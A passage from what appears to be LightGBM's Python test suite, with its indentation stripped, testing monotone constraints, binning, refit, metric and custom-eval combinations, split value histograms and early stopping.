@pytest.mark.parametrize("test_with_categorical_variable", [True, False])
def test_monotone_constraints(test_with_categorical_variable):
def is_increasing(y):
return (np.diff(y) >= 0.0).all()
def is_decreasing(y):
return (np.diff(y) <= 0.0).all()
def is_non_monotone(y):
return (np.diff(y) < 0.0).any() and (np.diff(y) > 0.0).any()
def is_correctly_constrained(learner, x3_to_category=True):
iterations = 10
n = 1000
variable_x = np.linspace(0, 1, n).reshape((n, 1))
fixed_xs_values = np.linspace(0, 1, n)
for i in range(iterations):
fixed_x = fixed_xs_values[i] * np.ones((n, 1))
monotonically_increasing_x = np.column_stack((variable_x, fixed_x, fixed_x))
monotonically_increasing_y = learner.predict(monotonically_increasing_x)
monotonically_decreasing_x = np.column_stack((fixed_x, variable_x, fixed_x))
monotonically_decreasing_y = learner.predict(monotonically_decreasing_x)
non_monotone_x = np.column_stack(
(
fixed_x,
fixed_x,
categorize(variable_x) if x3_to_category else variable_x,
)
)
non_monotone_y = learner.predict(non_monotone_x)
if not (
is_increasing(monotonically_increasing_y)
and is_decreasing(monotonically_decreasing_y)
and is_non_monotone(non_monotone_y)
):
return False
return True
def are_interactions_enforced(gbm, feature_sets):
def parse_tree_features(gbm):
# trees start at position 1.
tree_str = gbm.model_to_string().split("Tree")[1:]
feature_sets = []
for tree in tree_str:
# split_features are in 4th line.
features = tree.splitlines()[3].split("=")[1].split(" ")
features = set(f"Column_{f}" for f in features)
feature_sets.append(features)
return np.array(feature_sets)
def has_interaction(treef):
n = 0
for fs in feature_sets:
if len(treef.intersection(fs)) > 0:
n += 1
return n > 1
tree_features = parse_tree_features(gbm)
has_interaction_flag = np.array(
[has_interaction(treef) for treef in tree_features]
)
return not has_interaction_flag.any()
trainset = generate_trainset_for_monotone_constraints_tests(
test_with_categorical_variable
)
for test_with_interaction_constraints in [True, False]:
error_msg = ("Model not correctly constrained "
f"(test_with_interaction_constraints={test_with_interaction_constraints})")
for monotone_constraints_method in ["basic", "intermediate", "advanced"]:
params = {
"min_data": 20,
"num_leaves": 20,
"monotone_constraints": [1, -1, 0],
"monotone_constraints_method": monotone_constraints_method,
"use_missing": False,
}
if test_with_interaction_constraints:
params["interaction_constraints"] = [[0], [1], [2]]
constrained_model = lgb.train(params, trainset)
assert is_correctly_constrained(
constrained_model, test_with_categorical_variable
), error_msg
if test_with_interaction_constraints:
feature_sets = [["Column_0"], ["Column_1"], "Column_2"]
assert are_interactions_enforced(constrained_model, feature_sets)
def test_monotone_penalty():
def are_first_splits_non_monotone(tree, n, monotone_constraints):
if n <= 0:
return True
if "leaf_value" in tree:
return True
if monotone_constraints[tree["split_feature"]] != 0:
return False
return (are_first_splits_non_monotone(tree["left_child"], n - 1, monotone_constraints)
and are_first_splits_non_monotone(tree["right_child"], n - 1, monotone_constraints))
def are_there_monotone_splits(tree, monotone_constraints):
if "leaf_value" in tree:
return False
if monotone_constraints[tree["split_feature"]] != 0:
return True
return (are_there_monotone_splits(tree["left_child"], monotone_constraints)
or are_there_monotone_splits(tree["right_child"], monotone_constraints))
max_depth = 5
monotone_constraints = [1, -1, 0]
penalization_parameter = 2.0
trainset = generate_trainset_for_monotone_constraints_tests(x3_to_category=False)
for monotone_constraints_method in ["basic", "intermediate", "advanced"]:
params = {
'max_depth': max_depth,
'monotone_constraints': monotone_constraints,
'monotone_penalty': penalization_parameter,
"monotone_constraints_method": monotone_constraints_method,
}
constrained_model = lgb.train(params, trainset, 10)
dumped_model = constrained_model.dump_model()["tree_info"]
for tree in dumped_model:
assert are_first_splits_non_monotone(tree["tree_structure"], int(penalization_parameter),
monotone_constraints)
assert are_there_monotone_splits(tree["tree_structure"], monotone_constraints)
# test if a penalty as high as the depth indeed prohibits all monotone splits
def test_monotone_penalty_max():
max_depth = 5
monotone_constraints = [1, -1, 0]
penalization_parameter = max_depth
trainset_constrained_model = generate_trainset_for_monotone_constraints_tests(x3_to_category=False)
x = trainset_constrained_model.data
y = trainset_constrained_model.label
x3_negatively_correlated_with_y = x[:, 2]
trainset_unconstrained_model = lgb.Dataset(x3_negatively_correlated_with_y.reshape(-1, 1), label=y)
params_constrained_model = {
'monotone_constraints': monotone_constraints,
'monotone_penalty': penalization_parameter,
"max_depth": max_depth,
"gpu_use_dp": True,
}
params_unconstrained_model = {
"max_depth": max_depth,
"gpu_use_dp": True,
}
unconstrained_model = lgb.train(params_unconstrained_model, trainset_unconstrained_model, 10)
unconstrained_model_predictions = unconstrained_model.predict(
x3_negatively_correlated_with_y.reshape(-1, 1)
)
for monotone_constraints_method in ["basic", "intermediate", "advanced"]:
params_constrained_model["monotone_constraints_method"] = monotone_constraints_method
# The penalization is so high that the first 2 features should not be used here
constrained_model = lgb.train(params_constrained_model, trainset_constrained_model, 10)
# Check that a very high penalization is the same as not using the features at all
np.testing.assert_array_equal(constrained_model.predict(x), unconstrained_model_predictions)
def test_max_bin_by_feature():
col1 = np.arange(0, 100)[:, np.newaxis]
col2 = np.zeros((100, 1))
col2[20:] = 1
X = np.concatenate([col1, col2], axis=1)
y = np.arange(0, 100)
params = {
'objective': 'regression_l2',
'verbose': -1,
'num_leaves': 100,
'min_data_in_leaf': 1,
'min_sum_hessian_in_leaf': 0,
'min_data_in_bin': 1,
'max_bin_by_feature': [100, 2]
}
lgb_data = lgb.Dataset(X, label=y)
est = lgb.train(params, lgb_data, num_boost_round=1)
assert len(np.unique(est.predict(X))) == 100
params['max_bin_by_feature'] = [2, 100]
lgb_data = lgb.Dataset(X, label=y)
est = lgb.train(params, lgb_data, num_boost_round=1)
assert len(np.unique(est.predict(X))) == 3
def test_small_max_bin():
np.random.seed(0)
y = np.random.choice([0, 1], 100)
x = np.ones((100, 1))
x[:30, 0] = -1
x[60:, 0] = 2
params = {'objective': 'binary',
'seed': 0,
'min_data_in_leaf': 1,
'verbose': -1,
'max_bin': 2}
lgb_x = lgb.Dataset(x, label=y)
lgb.train(params, lgb_x, num_boost_round=5)
x[0, 0] = np.nan
params['max_bin'] = 3
lgb_x = lgb.Dataset(x, label=y)
lgb.train(params, lgb_x, num_boost_round=5)
np.random.seed() # reset seed
def test_refit():
X, y = load_breast_cancer(return_X_y=True)
X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.1, random_state=42)
params = {
'objective': 'binary',
'metric': 'binary_logloss',
'verbose': -1,
'min_data': 10
}
lgb_train = lgb.Dataset(X_train, y_train)
gbm = lgb.train(params, lgb_train, num_boost_round=20)
err_pred = log_loss(y_test, gbm.predict(X_test))
new_gbm = gbm.refit(X_test, y_test)
new_err_pred = log_loss(y_test, new_gbm.predict(X_test))
assert err_pred > new_err_pred
def test_mape_rf():
X, y = load_boston(return_X_y=True)
params = {
'boosting_type': 'rf',
'objective': 'mape',
'verbose': -1,
'bagging_freq': 1,
'bagging_fraction': 0.8,
'feature_fraction': 0.8,
'boost_from_average': True
}
lgb_train = lgb.Dataset(X, y)
gbm = lgb.train(params, lgb_train, num_boost_round=20)
pred = gbm.predict(X)
pred_mean = pred.mean()
assert pred_mean > 20
def test_mape_dart():
X, y = load_boston(return_X_y=True)
params = {
'boosting_type': 'dart',
'objective': 'mape',
'verbose': -1,
'bagging_freq': 1,
'bagging_fraction': 0.8,
'feature_fraction': 0.8,
'boost_from_average': False
}
lgb_train = lgb.Dataset(X, y)
gbm = lgb.train(params, lgb_train, num_boost_round=40)
pred = gbm.predict(X)
pred_mean = pred.mean()
assert pred_mean > 18
def check_constant_features(y_true, expected_pred, more_params):
X_train = np.ones((len(y_true), 1))
y_train = np.array(y_true)
params = {
'objective': 'regression',
'num_class': 1,
'verbose': -1,
'min_data': 1,
'num_leaves': 2,
'learning_rate': 1,
'min_data_in_bin': 1,
'boost_from_average': True
}
params.update(more_params)
lgb_train = lgb.Dataset(X_train, y_train, params=params)
gbm = lgb.train(params, lgb_train, num_boost_round=2)
pred = gbm.predict(X_train)
assert np.allclose(pred, expected_pred)
def test_constant_features_regression():
params = {
'objective': 'regression'
}
check_constant_features([0.0, 10.0, 0.0, 10.0], 5.0, params)
check_constant_features([0.0, 1.0, 2.0, 3.0], 1.5, params)
check_constant_features([-1.0, 1.0, -2.0, 2.0], 0.0, params)
def test_constant_features_binary():
params = {
'objective': 'binary'
}
check_constant_features([0.0, 10.0, 0.0, 10.0], 0.5, params)
check_constant_features([0.0, 1.0, 2.0, 3.0], 0.75, params)
def test_constant_features_multiclass():
params = {
'objective': 'multiclass',
'num_class': 3
}
check_constant_features([0.0, 1.0, 2.0, 0.0], [0.5, 0.25, 0.25], params)
check_constant_features([0.0, 1.0, 2.0, 1.0], [0.25, 0.5, 0.25], params)
def test_constant_features_multiclassova():
params = {
'objective': 'multiclassova',
'num_class': 3
}
check_constant_features([0.0, 1.0, 2.0, 0.0], [0.5, 0.25, 0.25], params)
check_constant_features([0.0, 1.0, 2.0, 1.0], [0.25, 0.5, 0.25], params)
def test_fpreproc():
def preprocess_data(dtrain, dtest, params):
train_data = dtrain.construct().get_data()
test_data = dtest.construct().get_data()
train_data[:, 0] += 1
test_data[:, 0] += 1
dtrain.label[-5:] = 3
dtest.label[-5:] = 3
dtrain = lgb.Dataset(train_data, dtrain.label)
dtest = lgb.Dataset(test_data, dtest.label, reference=dtrain)
params['num_class'] = 4
return dtrain, dtest, params
X, y = load_iris(return_X_y=True)
dataset = lgb.Dataset(X, y, free_raw_data=False)
params = {'objective': 'multiclass', 'num_class': 3, 'verbose': -1}
results = lgb.cv(params, dataset, num_boost_round=10, fpreproc=preprocess_data)
assert 'multi_logloss-mean' in results
assert len(results['multi_logloss-mean']) == 10
def test_metrics():
X, y = load_digits(n_class=2, return_X_y=True)
X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.1, random_state=42)
lgb_train = lgb.Dataset(X_train, y_train, silent=True)
lgb_valid = lgb.Dataset(X_test, y_test, reference=lgb_train, silent=True)
evals_result = {}
params_verbose = {'verbose': -1}
params_obj_verbose = {'objective': 'binary', 'verbose': -1}
params_obj_metric_log_verbose = {'objective': 'binary', 'metric': 'binary_logloss', 'verbose': -1}
params_obj_metric_err_verbose = {'objective': 'binary', 'metric': 'binary_error', 'verbose': -1}
params_obj_metric_inv_verbose = {'objective': 'binary', 'metric': 'invalid_metric', 'verbose': -1}
params_obj_metric_multi_verbose = {'objective': 'binary',
'metric': ['binary_logloss', 'binary_error'],
'verbose': -1}
params_obj_metric_none_verbose = {'objective': 'binary', 'metric': 'None', 'verbose': -1}
params_metric_log_verbose = {'metric': 'binary_logloss', 'verbose': -1}
params_metric_err_verbose = {'metric': 'binary_error', 'verbose': -1}
params_metric_inv_verbose = {'metric_types': 'invalid_metric', 'verbose': -1}
params_metric_multi_verbose = {'metric': ['binary_logloss', 'binary_error'], 'verbose': -1}
params_metric_none_verbose = {'metric': 'None', 'verbose': -1}
def get_cv_result(params=params_obj_verbose, **kwargs):
return lgb.cv(params, lgb_train, num_boost_round=2, verbose_eval=False, **kwargs)
def train_booster(params=params_obj_verbose, **kwargs):
lgb.train(params, lgb_train,
num_boost_round=2,
valid_sets=[lgb_valid],
evals_result=evals_result,
verbose_eval=False, **kwargs)
# no fobj, no feval
# default metric
res = get_cv_result()
assert len(res) == 2
assert 'binary_logloss-mean' in res
# non-default metric in params
res = get_cv_result(params=params_obj_metric_err_verbose)
assert len(res) == 2
assert 'binary_error-mean' in res
# default metric in args
res = get_cv_result(metrics='binary_logloss')
assert len(res) == 2
assert 'binary_logloss-mean' in res
# non-default metric in args
res = get_cv_result(metrics='binary_error')
assert len(res) == 2
assert 'binary_error-mean' in res
# metric in args overwrites one in params
res = get_cv_result(params=params_obj_metric_inv_verbose, metrics='binary_error')
assert len(res) == 2
assert 'binary_error-mean' in res
# multiple metrics in params
res = get_cv_result(params=params_obj_metric_multi_verbose)
assert len(res) == 4
assert 'binary_logloss-mean' in res
assert 'binary_error-mean' in res
# multiple metrics in args
res = get_cv_result(metrics=['binary_logloss', 'binary_error'])
assert len(res) == 4
assert 'binary_logloss-mean' in res
assert 'binary_error-mean' in res
# remove default metric by 'None' in list
res = get_cv_result(metrics=['None'])
assert len(res) == 0
# remove default metric by 'None' aliases
for na_alias in ('None', 'na', 'null', 'custom'):
res = get_cv_result(metrics=na_alias)
assert len(res) == 0
# fobj, no feval
# no default metric
res = get_cv_result(params=params_verbose, fobj=dummy_obj)
assert len(res) == 0
# metric in params
res = get_cv_result(params=params_metric_err_verbose, fobj=dummy_obj)
assert len(res) == 2
assert 'binary_error-mean' in res
# metric in args
res = get_cv_result(params=params_verbose, fobj=dummy_obj, metrics='binary_error')
assert len(res) == 2
assert 'binary_error-mean' in res
# metric in args overwrites its' alias in params
res = get_cv_result(params=params_metric_inv_verbose, fobj=dummy_obj, metrics='binary_error')
assert len(res) == 2
assert 'binary_error-mean' in res
# multiple metrics in params
res = get_cv_result(params=params_metric_multi_verbose, fobj=dummy_obj)
assert len(res) == 4
assert 'binary_logloss-mean' in res
assert 'binary_error-mean' in res
# multiple metrics in args
res = get_cv_result(params=params_verbose, fobj=dummy_obj,
metrics=['binary_logloss', 'binary_error'])
assert len(res) == 4
assert 'binary_logloss-mean' in res
assert 'binary_error-mean' in res
# no fobj, feval
# default metric with custom one
res = get_cv_result(feval=constant_metric)
assert len(res) == 4
assert 'binary_logloss-mean' in res
assert 'error-mean' in res
# non-default metric in params with custom one
res = get_cv_result(params=params_obj_metric_err_verbose, feval=constant_metric)
assert len(res) == 4
assert 'binary_error-mean' in res
assert 'error-mean' in res
# default metric in args with custom one
res = get_cv_result(metrics='binary_logloss', feval=constant_metric)
assert len(res) == 4
assert 'binary_logloss-mean' in res
assert 'error-mean' in res
# non-default metric in args with custom one
res = get_cv_result(metrics='binary_error', feval=constant_metric)
assert len(res) == 4
assert 'binary_error-mean' in res
assert 'error-mean' in res
# metric in args overwrites one in params, custom one is evaluated too
res = get_cv_result(params=params_obj_metric_inv_verbose, metrics='binary_error', feval=constant_metric)
assert len(res) == 4
assert 'binary_error-mean' in res
assert 'error-mean' in res
# multiple metrics in params with custom one
res = get_cv_result(params=params_obj_metric_multi_verbose, feval=constant_metric)
assert len(res) == 6
assert 'binary_logloss-mean' in res
assert 'binary_error-mean' in res
assert 'error-mean' in res
# multiple metrics in args with custom one
res = get_cv_result(metrics=['binary_logloss', 'binary_error'], feval=constant_metric)
assert len(res) == 6
assert 'binary_logloss-mean' in res
assert 'binary_error-mean' in res
assert 'error-mean' in res
# custom metric is evaluated despite 'None' is passed
res = get_cv_result(metrics=['None'], feval=constant_metric)
assert len(res) == 2
assert 'error-mean' in res
# fobj, feval
# no default metric, only custom one
res = get_cv_result(params=params_verbose, fobj=dummy_obj, feval=constant_metric)
assert len(res) == 2
assert 'error-mean' in res
# metric in params with custom one
res = get_cv_result(params=params_metric_err_verbose, fobj=dummy_obj, feval=constant_metric)
assert len(res) == 4
assert 'binary_error-mean' in res
assert 'error-mean' in res
# metric in args with custom one
res = get_cv_result(params=params_verbose, fobj=dummy_obj,
feval=constant_metric, metrics='binary_error')
assert len(res) == 4
assert 'binary_error-mean' in res
assert 'error-mean' in res
# metric in args overwrites one in params, custom one is evaluated too
res = get_cv_result(params=params_metric_inv_verbose, fobj=dummy_obj,
feval=constant_metric, metrics='binary_error')
assert len(res) == 4
assert 'binary_error-mean' in res
assert 'error-mean' in res
# multiple metrics in params with custom one
res = get_cv_result(params=params_metric_multi_verbose, fobj=dummy_obj, feval=constant_metric)
assert len(res) == 6
assert 'binary_logloss-mean' in res
assert 'binary_error-mean' in res
assert 'error-mean' in res
# multiple metrics in args with custom one
res = get_cv_result(params=params_verbose, fobj=dummy_obj, feval=constant_metric,
metrics=['binary_logloss', 'binary_error'])
assert len(res) == 6
assert 'binary_logloss-mean' in res
assert 'binary_error-mean' in res
assert 'error-mean' in res
# custom metric is evaluated despite 'None' is passed
res = get_cv_result(params=params_metric_none_verbose, fobj=dummy_obj, feval=constant_metric)
assert len(res) == 2
assert 'error-mean' in res
# no fobj, no feval
# default metric
train_booster()
assert len(evals_result['valid_0']) == 1
assert 'binary_logloss' in evals_result['valid_0']
# default metric in params
train_booster(params=params_obj_metric_log_verbose)
assert len(evals_result['valid_0']) == 1
assert 'binary_logloss' in evals_result['valid_0']
# non-default metric in params
train_booster(params=params_obj_metric_err_verbose)
assert len(evals_result['valid_0']) == 1
assert 'binary_error' in evals_result['valid_0']
# multiple metrics in params
train_booster(params=params_obj_metric_multi_verbose)
assert len(evals_result['valid_0']) == 2
assert 'binary_logloss' in evals_result['valid_0']
assert 'binary_error' in evals_result['valid_0']
# remove default metric by 'None' aliases
for na_alias in ('None', 'na', 'null', 'custom'):
params = {'objective': 'binary', 'metric': na_alias, 'verbose': -1}
train_booster(params=params)
assert len(evals_result) == 0
# fobj, no feval
# no default metric
train_booster(params=params_verbose, fobj=dummy_obj)
assert len(evals_result) == 0
# metric in params
train_booster(params=params_metric_log_verbose, fobj=dummy_obj)
assert len(evals_result['valid_0']) == 1
assert 'binary_logloss' in evals_result['valid_0']
# multiple metrics in params
train_booster(params=params_metric_multi_verbose, fobj=dummy_obj)
assert len(evals_result['valid_0']) == 2
assert 'binary_logloss' in evals_result['valid_0']
assert 'binary_error' in evals_result['valid_0']
# no fobj, feval
# default metric with custom one
train_booster(feval=constant_metric)
assert len(evals_result['valid_0']) == 2
assert 'binary_logloss' in evals_result['valid_0']
assert 'error' in evals_result['valid_0']
# default metric in params with custom one
train_booster(params=params_obj_metric_log_verbose, feval=constant_metric)
assert len(evals_result['valid_0']) == 2
assert 'binary_logloss' in evals_result['valid_0']
assert 'error' in evals_result['valid_0']
# non-default metric in params with custom one
train_booster(params=params_obj_metric_err_verbose, feval=constant_metric)
assert len(evals_result['valid_0']) == 2
assert 'binary_error' in evals_result['valid_0']
assert 'error' in evals_result['valid_0']
# multiple metrics in params with custom one
train_booster(params=params_obj_metric_multi_verbose, feval=constant_metric)
assert len(evals_result['valid_0']) == 3
assert 'binary_logloss' in evals_result['valid_0']
assert 'binary_error' in evals_result['valid_0']
assert 'error' in evals_result['valid_0']
# custom metric is evaluated despite 'None' is passed
train_booster(params=params_obj_metric_none_verbose, feval=constant_metric)
assert len(evals_result) == 1
assert 'error' in evals_result['valid_0']
# fobj, feval
# no default metric, only custom one
train_booster(params=params_verbose, fobj=dummy_obj, feval=constant_metric)
assert len(evals_result['valid_0']) == 1
assert 'error' in evals_result['valid_0']
# metric in params with custom one
train_booster(params=params_metric_log_verbose, fobj=dummy_obj, feval=constant_metric)
assert len(evals_result['valid_0']) == 2
assert 'binary_logloss' in evals_result['valid_0']
assert 'error' in evals_result['valid_0']
# multiple metrics in params with custom one
train_booster(params=params_metric_multi_verbose, fobj=dummy_obj, feval=constant_metric)
assert len(evals_result['valid_0']) == 3
assert 'binary_logloss' in evals_result['valid_0']
assert 'binary_error' in evals_result['valid_0']
assert 'error' in evals_result['valid_0']
# custom metric is evaluated despite 'None' is passed
train_booster(params=params_metric_none_verbose, fobj=dummy_obj, feval=constant_metric)
assert len(evals_result) == 1
assert 'error' in evals_result['valid_0']
X, y = load_digits(n_class=3, return_X_y=True)
lgb_train = lgb.Dataset(X, y, silent=True)
obj_multi_aliases = ['multiclass', 'softmax', 'multiclassova', 'multiclass_ova', 'ova', 'ovr']
for obj_multi_alias in obj_multi_aliases:
params_obj_class_3_verbose = {'objective': obj_multi_alias, 'num_class': 3, 'verbose': -1}
params_obj_class_1_verbose = {'objective': obj_multi_alias, 'num_class': 1, 'verbose': -1}
params_obj_verbose = {'objective': obj_multi_alias, 'verbose': -1}
# multiclass default metric
res = get_cv_result(params_obj_class_3_verbose)
assert len(res) == 2
assert 'multi_logloss-mean' in res
# multiclass default metric with custom one
res = get_cv_result(params_obj_class_3_verbose, feval=constant_metric)
assert len(res) == 4
assert 'multi_logloss-mean' in res
assert 'error-mean' in res
# multiclass metric alias with custom one for custom objective
res = get_cv_result(params_obj_class_3_verbose, fobj=dummy_obj, feval=constant_metric)
assert len(res) == 2
assert 'error-mean' in res
# no metric for invalid class_num
res = get_cv_result(params_obj_class_1_verbose, fobj=dummy_obj)
assert len(res) == 0
# custom metric for invalid class_num
res = get_cv_result(params_obj_class_1_verbose, fobj=dummy_obj, feval=constant_metric)
assert len(res) == 2
assert 'error-mean' in res
# multiclass metric alias with custom one with invalid class_num
with pytest.raises(lgb.basic.LightGBMError):
get_cv_result(params_obj_class_1_verbose, metrics=obj_multi_alias,
fobj=dummy_obj, feval=constant_metric)
# multiclass default metric without num_class
with pytest.raises(lgb.basic.LightGBMError):
get_cv_result(params_obj_verbose)
for metric_multi_alias in obj_multi_aliases + ['multi_logloss']:
# multiclass metric alias
res = get_cv_result(params_obj_class_3_verbose, metrics=metric_multi_alias)
assert len(res) == 2
assert 'multi_logloss-mean' in res
# multiclass metric
res = get_cv_result(params_obj_class_3_verbose, metrics='multi_error')
assert len(res) == 2
assert 'multi_error-mean' in res
# non-valid metric for multiclass objective
with pytest.raises(lgb.basic.LightGBMError):
get_cv_result(params_obj_class_3_verbose, metrics='binary_logloss')
params_class_3_verbose = {'num_class': 3, 'verbose': -1}
# non-default num_class for default objective
with pytest.raises(lgb.basic.LightGBMError):
get_cv_result(params_class_3_verbose)
# no metric with non-default num_class for custom objective
res = get_cv_result(params_class_3_verbose, fobj=dummy_obj)
assert len(res) == 0
for metric_multi_alias in obj_multi_aliases + ['multi_logloss']:
# multiclass metric alias for custom objective
res = get_cv_result(params_class_3_verbose, metrics=metric_multi_alias, fobj=dummy_obj)
assert len(res) == 2
assert 'multi_logloss-mean' in res
# multiclass metric for custom objective
res = get_cv_result(params_class_3_verbose, metrics='multi_error', fobj=dummy_obj)
assert len(res) == 2
assert 'multi_error-mean' in res
# binary metric with non-default num_class for custom objective
with pytest.raises(lgb.basic.LightGBMError):
get_cv_result(params_class_3_verbose, metrics='binary_error', fobj=dummy_obj)
def test_multiple_feval_train():
X, y = load_breast_cancer(return_X_y=True)
params = {'verbose': -1, 'objective': 'binary', 'metric': 'binary_logloss'}
X_train, X_validation, y_train, y_validation = train_test_split(X, y, test_size=0.2)
train_dataset = lgb.Dataset(data=X_train, label=y_train, silent=True)
validation_dataset = lgb.Dataset(data=X_validation, label=y_validation, reference=train_dataset, silent=True)
evals_result = {}
lgb.train(
params=params,
train_set=train_dataset,
valid_sets=validation_dataset,
num_boost_round=5,
feval=[constant_metric, decreasing_metric],
evals_result=evals_result)
assert len(evals_result['valid_0']) == 3
assert 'binary_logloss' in evals_result['valid_0']
assert 'error' in evals_result['valid_0']
assert 'decreasing_metric' in evals_result['valid_0']
def test_multiple_feval_cv():
X, y = load_breast_cancer(return_X_y=True)
params = {'verbose': -1, 'objective': 'binary', 'metric': 'binary_logloss'}
train_dataset = lgb.Dataset(data=X, label=y, silent=True)
cv_results = lgb.cv(
params=params,
train_set=train_dataset,
num_boost_round=5,
feval=[constant_metric, decreasing_metric])
# Expect three metrics but mean and stdv for each metric
assert len(cv_results) == 6
assert 'binary_logloss-mean' in cv_results
assert 'error-mean' in cv_results
assert 'decreasing_metric-mean' in cv_results
assert 'binary_logloss-stdv' in cv_results
assert 'error-stdv' in cv_results
assert 'decreasing_metric-stdv' in cv_results
@pytest.mark.skipif(psutil.virtual_memory().available / 1024 / 1024 / 1024 < 3, reason='not enough RAM')
def test_model_size():
X, y = load_boston(return_X_y=True)
data = lgb.Dataset(X, y)
bst = lgb.train({'verbose': -1}, data, num_boost_round=2)
y_pred = bst.predict(X)
model_str = bst.model_to_string()
one_tree = model_str[model_str.find('Tree=1'):model_str.find('end of trees')]
one_tree_size = len(one_tree)
one_tree = one_tree.replace('Tree=1', 'Tree={}')
multiplier = 100
total_trees = multiplier + 2
try:
before_tree_sizes = model_str[:model_str.find('tree_sizes')]
trees = model_str[model_str.find('Tree=0'):model_str.find('end of trees')]
more_trees = (one_tree * multiplier).format(*range(2, total_trees))
after_trees = model_str[model_str.find('end of trees'):]
num_end_spaces = 2**31 - one_tree_size * total_trees
new_model_str = f"{before_tree_sizes}\n\n{trees}{more_trees}{after_trees}{"":{num_end_spaces}}"
assert len(new_model_str) > 2**31
bst.model_from_string(new_model_str, verbose=False)
assert bst.num_trees() == total_trees
y_pred_new = bst.predict(X, num_iteration=2)
np.testing.assert_allclose(y_pred, y_pred_new)
except MemoryError:
pytest.skipTest('not enough RAM')
def test_get_split_value_histogram():
X, y = load_boston(return_X_y=True)
lgb_train = lgb.Dataset(X, y, categorical_feature=[2])
gbm = lgb.train({'verbose': -1}, lgb_train, num_boost_round=20)
# test XGBoost-style return value
params = {'feature': 0, 'xgboost_style': True}
assert gbm.get_split_value_histogram(**params).shape == (9, 2)
assert gbm.get_split_value_histogram(bins=999, **params).shape == (9, 2)
assert gbm.get_split_value_histogram(bins=-1, **params).shape == (1, 2)
assert gbm.get_split_value_histogram(bins=0, **params).shape == (1, 2)
assert gbm.get_split_value_histogram(bins=1, **params).shape == (1, 2)
assert gbm.get_split_value_histogram(bins=2, **params).shape == (2, 2)
assert gbm.get_split_value_histogram(bins=6, **params).shape == (5, 2)
assert gbm.get_split_value_histogram(bins=7, **params).shape == (6, 2)
if lgb.compat.PANDAS_INSTALLED:
np.testing.assert_allclose(
gbm.get_split_value_histogram(0, xgboost_style=True).values,
gbm.get_split_value_histogram(gbm.feature_name()[0], xgboost_style=True).values
)
np.testing.assert_allclose(
gbm.get_split_value_histogram(X.shape[-1] - 1, xgboost_style=True).values,
gbm.get_split_value_histogram(gbm.feature_name()[X.shape[-1] - 1], xgboost_style=True).values
)
else:
np.testing.assert_allclose(
gbm.get_split_value_histogram(0, xgboost_style=True),
gbm.get_split_value_histogram(gbm.feature_name()[0], xgboost_style=True)
)
np.testing.assert_allclose(
gbm.get_split_value_histogram(X.shape[-1] - 1, xgboost_style=True),
gbm.get_split_value_histogram(gbm.feature_name()[X.shape[-1] - 1], xgboost_style=True)
)
# test numpy-style return value
hist, bins = gbm.get_split_value_histogram(0)
assert len(hist) == 23
assert len(bins) == 24
hist, bins = gbm.get_split_value_histogram(0, bins=999)
assert len(hist) == 999
assert len(bins) == 1000
with pytest.raises(ValueError):
gbm.get_split_value_histogram(0, bins=-1)
with pytest.raises(ValueError):
gbm.get_split_value_histogram(0, bins=0)
hist, bins = gbm.get_split_value_histogram(0, bins=1)
assert len(hist) == 1
assert len(bins) == 2
hist, bins = gbm.get_split_value_histogram(0, bins=2)
assert len(hist) == 2
assert len(bins) == 3
hist, bins = gbm.get_split_value_histogram(0, bins=6)
assert len(hist) == 6
assert len(bins) == 7
hist, bins = gbm.get_split_value_histogram(0, bins=7)
assert len(hist) == 7
assert len(bins) == 8
hist_idx, bins_idx = gbm.get_split_value_histogram(0)
hist_name, bins_name = gbm.get_split_value_histogram(gbm.feature_name()[0])
np.testing.assert_array_equal(hist_idx, hist_name)
np.testing.assert_allclose(bins_idx, bins_name)
hist_idx, bins_idx = gbm.get_split_value_histogram(X.shape[-1] - 1)
hist_name, bins_name = gbm.get_split_value_histogram(gbm.feature_name()[X.shape[-1] - 1])
np.testing.assert_array_equal(hist_idx, hist_name)
np.testing.assert_allclose(bins_idx, bins_name)
# test bins string type
if np.__version__ > '1.11.0':
hist_vals, bin_edges = gbm.get_split_value_histogram(0, bins='auto')
hist = gbm.get_split_value_histogram(0, bins='auto', xgboost_style=True)
if lgb.compat.PANDAS_INSTALLED:
mask = hist_vals > 0
np.testing.assert_array_equal(hist_vals[mask], hist['Count'].values)
np.testing.assert_allclose(bin_edges[1:][mask], hist['SplitValue'].values)
else:
mask = hist_vals > 0
np.testing.assert_array_equal(hist_vals[mask], hist[:, 1])
np.testing.assert_allclose(bin_edges[1:][mask], hist[:, 0])
# test histogram is disabled for categorical features
with pytest.raises(lgb.basic.LightGBMError):
gbm.get_split_value_histogram(2)
def test_early_stopping_for_only_first_metric():
def metrics_combination_train_regression(valid_sets, metric_list, assumed_iteration,
first_metric_only, feval=None):
params = {
'objective': 'regression',
'learning_rate': 1.1,
'num_leaves': 10,
'metric': metric_list,
'verbose': -1,
'seed': 123
}
gbm = lgb.train(dict(params, first_metric_only=first_metric_only), lgb_train,
num_boost_round=25, valid_sets=valid_sets, feval=feval,
early_stopping_rounds=5, verbose_eval=False)
assert assumed_iteration == gbm.best_iteration
def metrics_combination_cv_regression(metric_list, assumed_iteration,
first_metric_only, eval_train_metric, feval=None):
params = {
'objective': 'regression',
'learning_rate': 0.9,
'num_leaves': 10,
'metric': metric_list,
'verbose': -1,
'seed': 123,
'gpu_use_dp': True
}
ret = lgb.cv(dict(params, first_metric_only=first_metric_only),
train_set=lgb_train, num_boost_round=25,
stratified=False, feval=feval,
early_stopping_rounds=5, verbose_eval=False,
eval_train_metric=eval_train_metric)
assert assumed_iteration == len(ret[list(ret.keys())[0]])
X, y = load_boston(return_X_y=True)
X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.2, random_state=42)
X_test1, X_test2, y_test1, y_test2 = train_test_split(X_test, y_test, test_size=0.5, random_state=73)
lgb_train = lgb.Dataset(X_train, y_train)
lgb_valid1 = lgb.Dataset(X_test1, y_test1, reference=lgb_train)
lgb_valid2 = lgb.Dataset(X_test2, y_test2, reference=lgb_train)
iter_valid1_l1 = 3
iter_valid1_l2 = 14
iter_valid2_l1 = 2
iter_valid2_l2 = 15
assert len(set([iter_valid1_l1, iter_valid1_l2, iter_valid2_l1, iter_valid2_l2])) == 4
iter_min_l1 = min([iter_valid1_l1, iter_valid2_l1])
iter_min_l2 = min([iter_valid1_l2, iter_valid2_l2])
iter_min_valid1 = min([iter_valid1_l1, iter_valid1_l2])
iter_cv_l1 = 4
iter_cv_l2 = 12
assert len(set([iter_cv_l1, iter_cv_l2])) == 2
iter_cv_min = min([iter_cv_l1, iter_cv_l2])
# test for lgb.train
